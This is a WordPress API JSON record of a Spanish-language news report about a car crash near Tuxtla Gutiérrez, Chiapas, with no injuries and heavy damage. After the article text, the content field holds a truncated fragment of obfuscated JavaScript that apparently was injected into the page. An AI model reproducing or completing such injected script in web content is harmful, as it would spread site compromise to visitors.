{"id":8748,"date":"2023-02-18T04:48:55","date_gmt":"2023-02-18T04:48:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8748"},"modified":"2023-02-18T04:48:55","modified_gmt":"2023-02-18T04:48:55","slug":"fuerte-choque-deja-cuantiosos-danos-materiales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8748","title":{"rendered":"Fuerte choque deja cuantiosos da\u00f1os materiales"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"960\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1676695632705.jpg\" alt=\"\" class=\"wp-image-8749\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1676695632705.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/FB_IMG_1676695632705-225x300.jpg 225w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 17 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte choque ocurrido este viernes por la ma\u00f1ana en el tramo Tuxtla-Chiapa de Corzo dej\u00f3 como saldo cuantiosos da\u00f1os materiales.Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando un autom\u00f3vil Kia Forte de color rojo se desplazaba en el carril de Oriente a Poniente cuando de manera repentina gir\u00f3 para dar vuelta en U lo que ocasion\u00f3 que bloqueara de manera moment\u00e1nea el carril contrario.Por este motivo una camioneta Suv Cros Fox de color naranja se impact\u00f3 de lleno ocasionando que brincara el Camell\u00f3n Central y terminar\u00e1 en el carril contrario.Pese al fuerte golpe, no se report\u00f3 personas lesionadas \u00fanicamente cuantiosos da\u00f1os materiales.Elementos de tr\u00e1nsito arribaron al lugar para poner a disposici\u00f3n de las autoridades competentes la dos unidades involucradas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 17 de febrero del 2023. Tuxtla Guti\u00e9rrez.- Un fuerte choque ocurrido este viernes por la ma\u00f1ana en el tramo Tuxtla-Chiapa de Corzo dej\u00f3 como saldo cuantiosos da\u00f1os materiales.Los reportes de tr\u00e1nsito informaron que, este hecho ocurri\u00f3 cuando un autom\u00f3vil Kia Forte de color rojo se desplazaba en el carril de Oriente a &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8749,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-8748","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8748","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8748"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8748\/revisions"}],"predecessor-version":[{"id":8750,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8748\/revisions\/8750"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8749"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8748"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8748"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8748"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}